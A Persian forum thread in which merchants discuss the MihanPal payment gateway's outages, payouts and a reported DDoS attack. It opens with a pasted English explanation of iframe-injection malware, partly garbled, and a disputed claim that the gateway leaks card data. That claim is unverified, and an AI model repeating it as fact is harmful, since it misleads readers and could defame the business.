A common attack against the web infrastructure can be the infection of harmless web pages. Some malware changes every HTML file stored on the disc and adds a link (very often an IFrame) to a site hosting malicious code. Other attacks can aim for the web servers and try to insert forwarding to the pages hosted there. The owner of these pages is advised to take them offline. Fix the hole (either on his own PC or on the server), check the pages for infections, clean them and go online
save the information bank card Iframe. Infected Web Pages often contain additional Iframe, Object or Script Tags. The Script Tags often contain encrypted Code. injection codsave the information bank card
که خودش میتونه خیلی کار ها بکنه اولین کار اینه که پرداخ کننده که تو فروشگاه که درگاه که میهن پال داره میاد اطلاعات کار بانکی شو میزنه و دو دستی تقدیم پارس پال میشه اینارو از خودم در نیاوردم بشتر از این گندشو در نیار فهمیدی؟ قرار شد از این میهن پال شکایت بشه به پلیس فتا خاستم بدونین
بالاخره میهن پال یا پارسپال ؟؟؟
ببین دوست عزیز این مدارکی که شما ارائه دادی لینک توضیحات چند تا ویرویس و تروجان مخرب هست .
اینا اصلا ربطی به میهن پال نداره .
بعد هم iframe توی همون صفحه ای که موجود باشه میتونه عملیات خربکاری رو انجام بده .
با توجه به ادعاهای شما باید iframe به تموم درگاههای بانکی تذریق بشه و از اونجا اطلاعات جمع آوری بشه که این ادعاتون یعنی هک کردن سیستم بانکی کشور !!!
باز عرض میکنم ، سیستم شما آلوده است ، و فایل های php دچار این کد iframe میشن و باز هم با این وجود اگر پرداختی هم انجام بدید هیچ خطری نداره .
دقت کنید اگر با ست کردن یک iframe در یک صفحه ، بشه اطلاعات صفحات بعد از اون رو بدست آورد ، خب من یه کاری میکردم هرکسی میاد از سایتم بازدید میکنه ، حتی وبلاگم ، سه سوت تموم هیستوریشون خالی کنم ، به نظر خودتون منطقی هست ؟؟؟
درجه امنیتی این ویروسهایی که اعلام کردید با توجه به اینکه هیچ ربطی به میهن پال نداره ، همشون Low هستن .
لطفا دوستان گفته بنده رو تائید کنید .
با تشکر
و در آخر شدیدا ازتون خواهش میکنم مراتب رو حتماً به پلیس فتا گزارش بدید تا بهتر مساله براتون توجیه بشه .
آنکه از حساب پاک است ، از محاکمه چه باک است
r.sharifi
May 1st, 2013, 02:02
تایید میشه :d
majid2009s
May 1st, 2013, 11:09
تایید میشه :d
ممنونم
ourweb
May 1st, 2013, 11:15
سرویس ایشان واقعا عالی هست ما در روز حدود 20 تراکنش داریم که ایشون زحمت میکشند و برامون هر روز پرداخت رو میزنند تایید میشوند
majid2009s
May 1st, 2013, 11:16
سرویس ایشان واقعا عالی هست ما در روز حدود 20 تراکنش داریم که ایشون زحمت میکشند و برامون هر روز پرداخت رو میزنند تایید میشوند
آیا میهن پال برای شما هم باز نمیشه ؟! ظاهرا یك ساعتی هست در دسترس نیست.
redbull
August 4th, 2013, 01:42
دوستان میهن پال چشه؟؟
amirwwe
September 15th, 2013, 10:48
سلام . میهن پال داونه . کسی شماره تلفنی از مدیرانش نداره ؟
ata3929
September 15th, 2013, 11:23
دوستان کسی میدونه این میهن پال چشه؟
بالا نمیاد
کسی شماره تلفن نداره ازش؟
majid2009s
September 15th, 2013, 15:31
دوستان کسی میدونه این میهن پال چشه؟
بالا نمیاد
کسی شماره تلفن نداره ازش؟
سایت 2-3 ساعت به دلیل ارتقا دان بود از ساعت 7:40 تا 11
hoka
September 15th, 2013, 23:15
درسته با توجه به مواردی همکاری رو ایشون با ما کنسل کردن ولی تا اون زمانی که با ایشون بودم بهترین درگاه بود . کارمزد کم - قابل اطمینان - درگاه های خوب - تسویه حساب سریع . کارشون واقعا خوبه
majid2009s
September 17th, 2013, 22:05
درسته با توجه به مواردی همکاری رو ایشون با ما کنسل کردن ولی تا اون زمانی که با ایشون بودم بهترین درگاه بود . کارمزد کم - قابل اطمینان - درگاه های خوب - تسویه حساب سریع . کارشون واقعا خوبه
ممنون ;)
ata3929
September 19th, 2013, 12:53
سلام آقا مجید
درگاه بانک ملت و چرا غیر فعال کردین؟
درگاه بانک جدیدی اضافه میکنین یا نه؟
SniTomb
September 19th, 2013, 13:08
رنگ زرد برخی از نوشته ها استایل سایت رو زشت کرده
noyfound
October 8th, 2013, 22:35
چرا دو روزه ایمیل تراکنش ها نمیاد ؟
datasups
October 8th, 2013, 22:58
میاد مشکل نداره
majid2009s
October 8th, 2013, 23:13
به دلیل اینکه مشکلی در اتصال به میل سرور ها وجود داره فعلا این سرویس غیر فعال شده به به حال قبل خواهد بازگشت
MUV
October 10th, 2013, 16:17
سلام
متاسفانه من پسوردم رو فراموش کردم و نیاز داشتم که پسورد برام ایمیل بشه و ایمیل نشده
اگه امکان داره بگید چطور وارد اکانتم بشم؟؟
یه مقدار عجله هم دارم
ادمین سایت
October 10th, 2013, 16:25
سلام
متاسفانه من پسوردم رو فراموش کردم و نیاز داشتم که پسورد برام ایمیل بشه و ایمیل نشده
اگه امکان داره بگید چطور وارد اکانتم بشم؟؟
یه مقدار عجله هم دارم
کسی که خودش سایت ارایه درگاه پرداخت داره. از میهن پال استفاده میکنه :d
MUV
October 10th, 2013, 16:29
بله . یه پلاگین وی آی پی هستش که روی وردپرس نصب میشه و هنوز به سایت خودم وصل نمیشه فقط به چند تا سایت که خود نویسنده کدش رو نوشته وصل میشه. برای همین با ایشون صبحت کردم و سایت وردپرس رو به سایت ایشون وصل کردم .
majid2009s
October 10th, 2013, 17:01
از طریق پیام خصوصی در ارتباط باشید . یوزرتون رو برام ارسال کنید.
MUV
October 10th, 2013, 17:55
پیام خصوصی شد
amirwwe
October 24th, 2013, 15:38
سلام . سایتتون داون هست !
asrhosting
October 24th, 2013, 15:54
نه خیر سایتشون نمایش داده میشه بدون مشکل
php dady
October 24th, 2013, 16:28
میهن پال از هر نظر تایید میشه
datasups
November 7th, 2013, 03:08
میهن پال از هر نظر تایید میشه
بهترین درگاه هوشمند فقط درگاه بانکها زیاد کنه بهتر میشه
saymon
November 9th, 2013, 14:32
چرا سایت داونه؟
ata3929
November 9th, 2013, 14:59
این مشکل درگاه کی حل میشه پس؟؟؟
noyfound
November 9th, 2013, 15:38
به نظر نمیاد مشکل حل شدنی باشه ! دوستانی که از باقی سایتها درگاه دارند هم چنین مشکلی دارن ؟
ata3929
November 9th, 2013, 15:40
بابا این سایت صاحب نداره که جواب این ملت و بده؟؟!!!!!!!!!!!!!!!!!!!
rezaonline.net
November 9th, 2013, 17:23
مشکل از زیرساخت مخابرات هست .
سایت برای بنده باز میشه بدون مشکل .
ata3929
November 9th, 2013, 17:26
درسته سایت باز میشه ولی از سایت کاربرا به سایت ایشون وصل نمیشه تا انتقال بده به بانک
vpsgroups
November 9th, 2013, 17:36
خبلی درگاه درپیتی هست !
0060
November 9th, 2013, 17:42
دورد
فکر نکنم ربطی به اینترنت داشته باشه روی چند تا سرور هم تست کردم پینگ نداره گویا مشکل از طرف سرور (http://www.intodns.com/mihanpal.com) هست
dertgtr
November 9th, 2013, 17:59
برای من باز میشه !
amirwwe
November 9th, 2013, 18:13
۲ روز هست هیچ تراکنشی انجام نمیشه و فقط اطلاعیه دادند دوستان از باز کردن تیکت خودداری کنید. از مشکلات به وجود امده اطلاع داریم لطفا صبور باشید.
دقیقا کی قراره حل بشه؟ جواب تیکت هم که نمیدید!
Enter You User Name
November 9th, 2013, 18:32
امیدوارم زودتر مشکل حل بشه ... درگاه بدون نقص و کاملی هست ...
majid2009s
November 9th, 2013, 18:36
با عرض پوزش خدمت کاربران گرامی
سایت به سرور جدید منتقل خواهد شد.
به دلیل بلوک شدن ای پی سایت فقط برای ای پی های ایرانی قابل مشاهده است که بزودی رفع میشه.
تمامی تسویه ها هم انجام میشه هیچ مشکلی هم از این بابت نیست.
لطفا منتظر باشید پیگیر این موضوع هستیم.
noyfound
November 9th, 2013, 18:38
مشکل از زیر ساخت میهن پال هست ! بعضی سرویس دهنده ها دیروز این مشکل رو داشتند که مشکلشون رو حل کردن.
سایت که بله باز میشه اما vps میهن پال ارتباطش فقط با اینترانت وصله و از اینترنت قطعه کافیه با آی پی خارجی امتحان کنید!
از میهن پال انتظار میرفت که یک vps بک آپ تو دیتاسنتر داخلی دیگه داشته باشه تا سوئیچ کنه روش ولیکن منتظر مونده تا ارتباط سرور فعلیش با نت برقرار شه که معلوم نیست کی این اتفاق بیفته.
Enter You User Name
November 9th, 2013, 18:54
با عرض پوزش خدمت کاربران گرامی
سایت به سرور جدید منتقل خواهد شد.
به دلیل بلوک شدن ای پی سایت فقط برای ای پی های ایرانی قابل مشاهده است که بزودی رفع میشه.
تمامی تسویه ها هم انجام میشه هیچ مشکلی هم از این بابت نیست.
لطفا منتظر باشید پیگیر این موضوع هستیم.
میتونید بگید حداکثر تا کی این مشکل حل میشه ؟
majid2009s
November 9th, 2013, 19:52
سعی ما بر این است که مشکلات تا فردا رفع شود.
ata3929
November 10th, 2013, 11:30
چی شد پس امروز هم که حل نشده؟
بابا تا کی ما الاف شما باشیم یکنم مسئولیت پذیر باشین دیگه
Enter You User Name
November 10th, 2013, 14:35
واسه من حل شده مشکل .
iran-data.net
November 10th, 2013, 14:57
کارشون تک .خیلی خوبن :ی
hamed20100
November 21st, 2013, 22:51
-------------------------------------
noyfound
December 8th, 2013, 16:04
چرا خرابه سایت ؟ Internal Server Error
majid2009s
December 8th, 2013, 17:33
چرا خرابه سایت ؟ Internal Server Error
مشکل رفع شد.
Enter You User Name
December 16th, 2013, 18:53
سایت واسه من بالا نمیاد البته به درگاه وصل میشه 8-|
ehsan_296
December 16th, 2013, 21:52
الان من چک کردم همه چی اوکی هست . هم سایت بالا میاد و هم درگاه درست هست . هنوز مشکل دارید ؟
OmidX
December 16th, 2013, 22:52
ماژول پرداخت برای تومیتوکارت پارسی (http://forum.tomatoshop.ir) رو هم قرار بدید ...
noyfound
February 28th, 2014, 14:20
تراکنشها به مشکل خورده و صفحه بانک باز نمیشه ، برای باقی دوستان هم همینطوره ؟
MUV
February 28th, 2014, 14:22
من چک کردم مشکلی نداشت
noyfound
February 28th, 2014, 14:28
حل شد موقتی بود
noyfound
March 4th, 2014, 11:46
ویرایش ...
MUV
March 9th, 2014, 12:45
به طرز فجیعی دیر باز میشه سایت و درگاه. لطفا رسیدگی کنید
noyfound
March 9th, 2014, 13:08
الان که اصلا باز نمیشه
majid2009s
March 9th, 2014, 13:10
در حال بررسی موضوع هستیم لطفا صبور باشید.
ata3929
March 9th, 2014, 13:52
لطفا آدرس شرکت و شماره تماس بدین
رو سایت که هیچ چیزی نزدین
majid2009s
March 9th, 2014, 14:17
طی چند روز اینده بروی سایت قرار خواهد گرفت
Ndanda
March 16th, 2014, 20:35
سلام یه مشکلی دارم ممنون میشم کمک کنید درگاه وصل کردم هیچ مشکلی هم نداشته تا نیم ساعت پیش الان موقعی که میزنم برای خرید که وصل شم به درگاه میزنه
خطا در اتصال به میهن پال
لطفا راهنمایی کنید مشکل از چی میتونه باشه اسکریپت فریر هم استفاده میکنم
majid2009s
March 16th, 2014, 22:01
سلام یه مشکلی دارم ممنون میشم کمک کنید درگاه وصل کردم هیچ مشکلی هم نداشته تا نیم ساعت پیش الان موقعی که میزنم برای خرید که وصل شم به درگاه میزنه
خطا در اتصال به میهن پال
لطفا راهنمایی کنید مشکل از چی میتونه باشه اسکریپت فریر هم استفاده میکنم
لطف کنید تیکت باز کنید تا به مشکلتون رسیدگی شود.
noyfound
March 17th, 2014, 01:24
این پیام که الان میاد یعنی چی ؟
در حال انتقال ...
اگر میخواید سرور رو انتقال بدید لطفا روز و ساعت انتقال رو پیشاپیش اعلام کنید !
asiahosting
March 17th, 2014, 01:49
با سلام آرزوی موفقیت میکنم براتون
موفق باشید
pooria.tm
March 28th, 2014, 02:19
از پنجم تا حالا درخواست واریز دادم انجام نشده
هی تیکت میگید منتظر باشید
این طوری وجه خودتون رو خراب میکنین که دیگه اعتماد نکنیم
من خدارو شکر کارم کاملا قانونی هست (اکانت نود 32 )
اگه تا صبح روز 8 فروردین واریز نشه
از راه قانونی پیگیری میکنم خواهر بنده هم وکیل پایه 1 دادگستری هست (جهت اطلاع)
taha_2011
March 28th, 2014, 03:02
از پنجم تا حالا درخواست واریز دادم انجام نشده
هی تیکت میگید منتظر باشید
این طوری وجه خودتون رو خراب میکنین که دیگه اعتماد نکنیم
من خدارو شکر کارم کاملا قانونی هست (اکانت نود 32 )
اگه تا صبح روز 8 فروردین واریز نشه
از راه قانونی پیگیری میکنم خواهر بنده هم وکیل پایه 1 دادگستری هست (جهت اطلاع)
عزیز این حرفتون اصلا صحت نداره بنده از این سایت درگاه دارم و خدا میدونه خیلی سریع تسویه میکنن حتی در همین تعطیلات!
اگر مایل باشید میتونم عکسشم قرار بدم تا ببنید
کیفیت درگاه های میهن پال و برخورد با مشتریاشون واقعا عالی و تحصین برانگیزه
امیدوارم قصد تخریب این شرکت رو نداشته باشید!
rodfile.ir
March 28th, 2014, 03:05
طی چند روز اینده بروی سایت قرار خواهد گرفت
دوست عزیز لطفا برای رفع ابهام دوستان شماره ثبت شرکتی و نام شرکت ثبت شدنتون رو بدید
داخل سایت چیزی پیدا نکردیم
pooria.tm
March 28th, 2014, 03:27
عزیز این حرفتون اصلا صحت نداره بنده از این سایت درگاه دارم و خدا میدونه خیلی سریع تسویه میکنن حتی در همین تعطیلات!
اگر مایل باشید میتونم عکسشم قرار بدم تا ببنید
کیفیت درگاه های میهن پال و برخورد با مشتریاشون واقعا عالی و تحصین برانگیزه
امیدوارم قصد تخریب این شرکت رو نداشته باشید!
دوست عزیز من آزار دارم بیام کسی رو تخریب کنم ؟
میتونم براتون عکس بزارم ببینین
با مدرک
درگاه شتاب هم که کلاه برداری کرد اول رضایت جلب کرد و بعد ... البته شنیدم گرفتنش و شاکی خصوص خیلی زیاد داشته .
امید وارم که حرفم اشتباه باشه
واریزی های شما هم حدس میزنم زیر 300 تومان بوده .
ehsan_296
March 28th, 2014, 14:26
دوست عزیز من آزار دارم بیام کسی رو تخریب کنم ؟
میتونم براتون عکس بزارم ببینین
با مدرک
درگاه شتاب هم که کلاه برداری کرد اول رضایت جلب کرد و بعد ... البته شنیدم گرفتنش و شاکی خصوص خیلی زیاد داشته .
امید وارم که حرفم اشتباه باشه
واریزی های شما هم حدس میزنم زیر 300 تومان بوده .
ولی بعضی ها آزار دارن بیان کسی رو تو این انجمن تخریب کنن :)
با ایشون کلی کار کردیم اخلاق خوب پشتیبانی و سرعت کاری بالا
pooria.tm
March 28th, 2014, 22:27
برای بنده هم واریز شد
ولی با سر کار گذاشتن که من سایت رو با حسابم رو 400 بار رفرش دادم به گفتشون واریز میشه
ولی 1 روز بعد واریز شد به حساب بنده.
من برای تسویه سریع حساب باز کردم که 4 بار در روز باشه به گفته خودشون ...
و شماره تلفن همراه !
آدرس !
شماره ثبت !
هیچ کدوم رو داخل سایت پیدا نکردم !
اصلا قصدم تخریب نیست ولی آدم شک میکنه چون این بلا رو جی پال و شتاب به سر ما اورد که 3 ماه بعد با شکایت پولمون رو پس گرفتیم .
من اگه بخوام آقای میهن پال رو پیدا کنم از کدوم آدرس و شماره تماس موبایل ؟
خودشون گفتن طی چند روز آینده قرار میدیم پستشون موجود هست
20 روز گذشته هنوز چیزی قرار نگرفته .
به حر حال من بدی از ایشون ندیدم و باهاشون چند ماهی تقریبا کار کردم . خیلی خوب پشتیبانی و تسویه بود.
ولی بنده درگاه رو غیر فعال کردم
موفق باشید
meva300
March 31st, 2014, 13:15
میهن پال تایید میشه
از همه نظر
تسویه بموقع- رفتار مناسب با کاربران - و...
redpayam
April 3rd, 2014, 21:34
دوستان درگاه میهن پال چطوره؟! تایید میشه؟!
ممنون
taha_2011
April 4th, 2014, 00:23
میهن پال واقعا عالیه
majid2009s
April 17th, 2014, 22:51
در حال بررسی موضوع هستیم فعلا سایت فقط برای ای پی های داخل کشور باز می شود.
taha_2011
April 17th, 2014, 23:53
برای من با آی پی ایران باز شد. لطفا مودمتونو یک بار ریسیت بدید آی پیتون عوض بشه
امیدواریم هرچه سریع تر این مشکل برطرف بشه
موفق باشید
taha_2011
April 18th, 2014, 11:56
ببخشید جناب صالحی
مشکل حل شد ماژول هارو فعال کنیم؟
noyfound
April 18th, 2014, 13:38
کلا تعطیل شد. چه خبره ؟ یه ایمیلی ، پستی چیزی !
taha_2011
April 18th, 2014, 13:41
مثل اینکه دارند سرور انتقال میدند و داخل پنلشون اطلاع رسانی هم کردند
noyfound
April 18th, 2014, 13:45
مثل اینکه دارند سرور انتقال میدند و داخل پنلشون اطلاع رسانی هم کردند
پنل کجا بود ؟ وقتی سایت باز نمیشه اطلاع رسانی تو سایت چه فایده ای داره دقیقا ؟ ببینیم واقعا انتقال سروری در کار هست یا باز هم منتظر می مونن اینترنت دیتاسنتر درست شه ! بعدشم میبینی آی پی دوباره همون آی پی قبلیه.
taha_2011
April 18th, 2014, 13:48
عزیز چرا تند میرید. این مشکلات طبیعیه!
ما چند سال هست داریم باهاشون کار میکنیم!
درضمن دیشب هم در همین پست اطلاع رسانی کردند!
noyfound
April 18th, 2014, 14:18
عزیز چرا تند میرید. این مشکلات طبیعیه!
ما چند سال هست داریم باهاشون کار میکنیم!
درضمن دیشب هم در همین پست اطلاع رسانی کردند!
مشکل که طبیعیه ولی مشکلی که تکرار شه طبیعی نیست ! شما که چند ساله داری با میهن پال کار می کنی (هنوز دو سال نشده میهن پال راه افتاده !) حتما اطلاعیه تغییر سرور قبلی به خاطر همین مشکل رو یادتونه دیگه نه ؟!!
چون دو روزه دارم با میهن پال کار می کنم، میگم . لینک های زیر رو واسه سرگرمی نگاه کنید :
از ایشون فقط میشه تعریف کرد!
سرویس دهی بسیار خوب تا الان ازشون دارم سرویس میگیرم
پاسخگویی به تیکت ها تسویه حساب سریع و...
majid2009s
April 18th, 2014, 14:35
دوستان عزیز ارتباط سرور با اینترنت دچار مشکل شده لطفا صبور باشید زمان دقیق درست شدن مسئله مشخص نیست
تمام سعیمون بر این هست که سریع تر انجام شود
Ndanda
April 18th, 2014, 14:36
من هم با ای پی داخل چک کردم هم خارج باز نمیشه !
noyfound
April 18th, 2014, 14:51
مشکل باز شدن وبسایت برای من حل شده (فقط آی پی داخلی)
پ.ن : اون کسی که به من پ.خ داده اینباکسش پره !
aminexe
April 18th, 2014, 15:01
سلام خدمت شما دوست گرامی ؛ دیشب حدود ساعت 12 سایتشون باز بود و رفتم داخل پنلم ، اطلاعیه زده بودن در حال انتقال لطفا صبور باشید .
شما هم حرص نخورید مشکلشون به زودی حل میشه .
موفق باشید .
redpayam
April 18th, 2014, 20:20
باز میشه برا من
noyfound
April 19th, 2014, 09:48
دو روز شد و همچنان خراب! ما که رفتیم.
taha_2011
April 19th, 2014, 14:01
جناب صدرالدینی چی شد؟؟؟
aminexe
April 19th, 2014, 14:04
سلام چی شد ؟
فکر نکنم انتقال انقدر طول بکشه ؟
ست شدن آی پی هم که توسط درگاه 24 ساعته ، الان 48 ساعت شد
یه زمانی دقیق بگید حداقل به فکر جایگزین درگاه باشیم
rezaonline.net
April 19th, 2014, 14:14
سلام
کمی صبور باشید ، آقای صدرالدینی شدیدا مشغول هستن و پیگیر هستن تا مشکل رو رفع کنند.
pourya74
April 19th, 2014, 14:26
یکی از دلایلی که باعث شد از یه درگاه دیگه بیایم میهن پال همین پایداری بالا و موفقیت آمیز بودن اکثر تراکنش ها بود .
امیدوارم سرور جدید باعث به وجود آمدن اختلال نشه .
mparsa
April 19th, 2014, 14:47
براتون آرزوی موفقیت میکنیم
سیستم بسیار خوب و جالبی هست
sat2they
April 19th, 2014, 18:29
امیدورم هرچه سریعتر مشکل حل بشه
من 2 ساله با میهن پال دارم کار میکنم واقعا جزو بهترین درگاهاست
persianmagic
April 19th, 2014, 19:40
جناب صدرالدینی 3 روز بیشتر شد که سایت مشکل داره.قبلا هم این موارد وجود داشت
لطفا هرچه سریعتر وضعیت سایت رو اوکی کنید کم کم داریم بابت این مشکلات متضرر میشیم
یک ساعت قطعی هم اعتبار شما رو کم میکنه چه برسه به این وضعیت لطفا یک مقدار بیشتر حساسیت داشته باشید
April 19th, 2014, 21:45
سه روز گذشت :) هیچکس هم نیست پاسخگو باشه
مینا-صیفی
April 19th, 2014, 21:54
شما مجبور نیستید که انقدر سوال میکنید برید جای دیگه درگاه استفاده کنید خوب حالا که این قطع هست همه میدونن دیگه کشش ندید جای دیگه فعال کنید رو سایتتون تا میهن پل درست بشه . مدیر میهن پل هم بیکار ننشسته داره خلاصه پیگیری درست میکنه اون از خداشه که زود درست بشه بیشتر از کاربر نگران هست حتما مشکل بزرگ یا زیبادی هست که 2.3روز طول کشید فعلا از درگاه جانبی استفاده کنید انقدرم تاپیک نزنید به من ربط نداره بخاطره خودتون میگم.
rezaonline.net
April 19th, 2014, 22:27
طبق آخرین اطلاعی که بنده دارم.
سرور جدید مجددا در حال کانفیگ هست ، به محض پایان شدن کانفیگ انتقال انجام میگیرد.
لطفا کمی صبور باشید . (در ضمن بنده پشتیبان میهن پال نیستم به دلیل تماسی که با ایشون دارم و درک میکنم که شما نگرانید این اطلاعات رو بهتون میدم ، لطفا از تماس تلفنی با بنده خودداری کنید)
MizbanVps
April 20th, 2014, 10:11
میگم دوستان یک موقعه سناریو شتاب دات بیر و جی پال نشه؟؟؟؟؟؟؟؟؟؟؟ حواس جمع
majid2009s
April 20th, 2014, 10:47
میگم دوستان یک موقعه سناریو شتاب دات بیر و جی پال نشه؟؟؟؟؟؟؟؟؟؟؟ حواس جمع
تا اخرین ریال با کاربران تسویه می شود . پیگیر موضوع هستیم
Nima.PA
April 20th, 2014, 11:16
من دلیلشواصلا متوجه نمیشم سایتی که از اول تاحالا مثل ساعت کارمیکرده یک دفعه کلا از مدار خارج بشه ایا حمله ای چیری به سرورتون شده یا مشکل دیگه ای هست تخمین رمان بازگشت به حالت اولیه چقدره به نظر شما
meva300
April 20th, 2014, 11:21
دوستان چقدر عجول هستید شما ؟!!!!
بنده تقریبا دوسال هست از میهن پال درگاه دارم
از همه نظر تایید میشن آقای صدرالدینی
یکم صبر کنید مشکل حل میشه!
majid2009s
April 20th, 2014, 11:25
بله مشکل حمله بوده.
bia2server
April 20th, 2014, 12:03
هنوز که مشکل حل نشده با این کار مشتریاشونو از دست دادن
doke_palang
April 20th, 2014, 14:52
با سلام
آقا شرمنده اکی شد دمت جیز
با تشکر
taha_2011
April 20th, 2014, 14:54
با سلام
دوست عزیز این سرور من فردا باید هزینشو بدم ممنون میشم جساب من تسویه کنید
2تا یوزر داخل سایت شما دارم یکی nic و یکی دیگه onsky هست
با تشکر
عزیز بهتر بود این موضوع رو پ.خ کنید براشون
majid2009s
April 20th, 2014, 15:42
مشکل سایت بر طرف شد.
تسویه ها تا ساعاتی دیگر به حساب کاربران واریز می شود.
taha_2011
April 20th, 2014, 17:06
ایول! مشکل سایت برطرف شده
ما که دوباره برگشتیم میهن پال:d
مینا-صیفی
April 20th, 2014, 20:57
جناب اقای مجید خسته نباشید و انشالاه هرچی بلا و دشمنی حسودی از شما و سایتتون دور باشد زیرا ما شما رو قلبن دوست داریم روند خوب کاریتون و حلالیتی که در وجود کار شماست و درجا مشکل حل شد پول کاربرانتون را دادید . این مشکلات پیش میاد در همه نوع شغل ها و سایت ها چون یکسری افراد چشم دیدن پیشرفت کسی را ندارند اما شما با اعتباری که دارید نمیتونن سایت و شما را خراب کنند همیشه و انشالاه دیگه اینجور مشکله حمله پیش نیاد براتون :X ( اعنت به اون کسی که این حمله زدن را کشف کرد نابود بشه این برنامه و این حمله زند ddose چیه اینا منغرض بشه )
majid2009s
April 20th, 2014, 23:22
جناب اقای مجید خسته نباشید و انشالاه هرچی بلا و دشمنی حسودی از شما و سایتتون دور باشد زیرا ما شما رو قلبن دوست داریم روند خوب کاریتون و حلالیتی که در وجود کار شماست و درجا مشکل حل شد پول کاربرانتون را دادید . این مشکلات پیش میاد در همه نوع شغل ها و سایت ها چون یکسری افراد چشم دیدن پیشرفت کسی را ندارند اما شما با اعتباری که دارید نمیتونن سایت و شما را خراب کنند همیشه و انشالاه دیگه اینجور مشکله حمله پیش نیاد براتون :X ( اعنت به اون کسی که این حمله زدن را کشف کرد نابود بشه این برنامه و این حمله زند ddose چیه اینا منغرض بشه )
ممنونم از شما.
meva300
April 20th, 2014, 23:26
سلام
از وقتی سایت با مشکل مواجه شد من تو ماژول فریر مشکل دارم
میگه خطا در اتصال به میهن پال
ماژول رو چند دفعه پاک کردم و بعد دوباره آپ کردم اما باز همون ارور :-s
majid2009s
April 20th, 2014, 23:47
سلام
اینگونه مشکلات رو در سایت تیکت بزنید تا راهنماییتون کنیم.
hector3699
April 21st, 2014, 12:15
سایتتون با آی پی خارجی بالا نمیاد. نمیدونم خودتون بستینش یا همچنان مشکل وجود داره
bia2server
April 21st, 2014, 12:16
برای من که دوباره درگاه وصل نمیشه
persianmagic
April 21st, 2014, 14:16
اینگونه مشکلات رو در سایت تیکت بزنید تا راهنماییتون کنیم.
بعد از گذشته چند روز متاسفانه هنوز هم درگاه فیکس نشده و قطعی های پیاپی رو شاهد هستیم
taha_2011
April 21st, 2014, 16:09
خدا لعنت کنه هرکی داره سنگ میندازه تو کاسبیه جناب صدرالدبنی.
این حملات فقط میتونه کار یک رقیب باشه که میخواد کاربرای میهن پال رو بیاره به سمت خودش!
ولی جناب صدرالدینی ما همیشه پشتتیم
انشالا بتونید جلوی حملات رو بگیرید.
موفق باشید
bia2server
April 21st, 2014, 16:13
نمیدونم چرا درگاه مشکل داشت بهم یه کاری گفتن انجام دادم درست شد ولی حالا ایمیل نمیاد که خرید شده
SM-Movie
April 21st, 2014, 16:59
بنده از میهن پال کاملا راضی هستم خیلی سیستم خوبی داره و محدودیت های کمی (برخلاف سایت های دیگه) داره...مثل اینکه بعد از چند روز خرابی و درست شدن باز هم امروز مشکل پیدا کرده..امیدوارم این مشکل تا امروز حل بشه تا نه ما ضرر کنیم نه اقای صدرالدینی
sat2they
April 21st, 2014, 18:25
جناب صدرالدینی حداقل یک اطلاع رسانی بکنید .
lvlehrad
April 22nd, 2014, 05:35
لطفا یه اطلاع رسانی در رابطه با مشکلتون بکنید و یه تاریخ بدید که بدونیم کی حل میشه...اصلا حل میشه یا نه...چون ما فقط از شما درگاه میگیریم و وقتی برای شما مشکلی پیش میاد ما خیلی ضرر میکنیم...
meva300
April 22nd, 2014, 09:56
امیدوارم هر چه زودتر درست بشه :39:
rased
April 22nd, 2014, 11:32
سلام
من ماژول ارسال پیام کوتاهم از کار افتاده.دیگه بعد از خرید پیامک نمیفرسته
- - - Updated - - -
سلام
من ماژول ارسال پیام کوتاهم از کار افتاده.دیگه بعد از خرید پیامک نمیفرسته
bia2server
April 22nd, 2014, 13:36
به من گفتن که
ماژولتون رو ادیت کرده
ادرس وب سرویستون رو از
http://www.mihanpal.com/index.php/payment/wsdl
به
http://mihanpal.net/index.php?wsdl
تغییر دهید.
درست شد فقط هواستون باشه اول ماژول رو غیرفعال کنید بعد ادیت کنید
فقط دوتا مشکل داره ایمیل پرداخت رو با تاخیر میفرسته و تو ایمیل و قسمت مشاهده تراکنشهای درگاه
» توضیحات : %D8%A8%DB%8C%D8%A7+%D8%AA%D9%88+%D8%B3%D8%B1%D9%88 %D8%B1+%D8%B3%D8%A7%D9%85%D8%A7%D9%86
اینجوری میشه لطفا پیگیری کنید
meva300
April 22nd, 2014, 13:50
فکر کنم مشکل حل شده باشه
bia2server
April 22nd, 2014, 13:53
فکر کنم مشکل حل شده باشه
بله مشکل پرداخت حل شده
pourya74
April 22nd, 2014, 13:54
در درستکاری شما تا الان که شکی نبوده ...
اما ظاهرا مشکلات تمومی نداره و تیکت ها هم که پاسخ داده نمیشن :-|
majid2009s
April 22nd, 2014, 14:16
به دلیل بالا بودن تعداد تیکت ها امکان پاسخگویی نیست
تمامی تسویه ها مانند سابق انجام می شود.
از بالا آوردن تاپیک خودداری کنید.
bia2server
April 22nd, 2014, 14:18
به دلیل بالا بودن تعداد تیکت ها امکان پاسخگویی نیست
تمامی تسویه ها مانند سابق انجام می شود.
از بالا آوردن تاپیک خودداری کنید.
پس مشکل چیه درگاه که درسته
felfel
April 22nd, 2014, 14:21
متاسفانه یکی از دوستام از سایت ایشان درگاه داشت خیلی راحت اطلاعات شخصی بنده خدا را بیرون آوردند نمیدونم چگونه.. در صورتی که آقای صدرالدینی هم گفته اند ما نداده ایم...!
siingle_boy
April 22nd, 2014, 16:59
اگه مشکل میهن پال کامل حل شده بگید ما برگردیم رو همین میهن پال
اگه نه دوباره فردا میخواد خراب شه ک بازم بگید :-p
majid2009s
April 22nd, 2014, 18:34
متاسفانه یکی از دوستام از سایت ایشان درگاه داشت خیلی راحت اطلاعات شخصی بنده خدا را بیرون آوردند نمیدونم چگونه.. در صورتی که آقای صدرالدینی هم گفته اند ما نداده ایم...!
احتمالا اطلاعاتشون رو پلیس فتا استعلام کرده اند.
siingle_boy
April 23rd, 2014, 14:19
آقا مشکل حل شد ؟
ehsan_296
April 23rd, 2014, 14:25
آقا مشکل حل شد ؟
عرض کردن که رفع شده مشکلاتشون و الان مثل سابق ادامه می دن
siingle_boy
April 23rd, 2014, 14:28
عرض کردن که رفع شده مشکلاتشون و الان مثل سابق ادامه می دن
کجا عرض کردن :|?
ehsan_296
April 23rd, 2014, 14:35
کجا عرض کردن :|?
اگر عضو سایتشون باشید . ضفحه اول ذکر کردن برای همه اعضا
موفق باشید
bia2server
April 23rd, 2014, 17:24
اگر کاری گفتن تو ماژولتون انجام بدید مشکل حل میشه
sabashop
April 27th, 2014, 18:01
سلام شرمنده پست میدم ولی این دو سه روزه هم دوباره هی قطعی دیده شده تو درگاه
چییکار باید بکنیم؟!
taha_2011
April 29th, 2014, 00:50
جناب درگاه بانک ملی کی فعال میشه؟
مینا-صیفی
April 29th, 2014, 01:13
باز سایت میهن پل خراب شد :((
mad-adwords
April 29th, 2014, 07:03
باز می شه مشکلی نداره
persianmagic
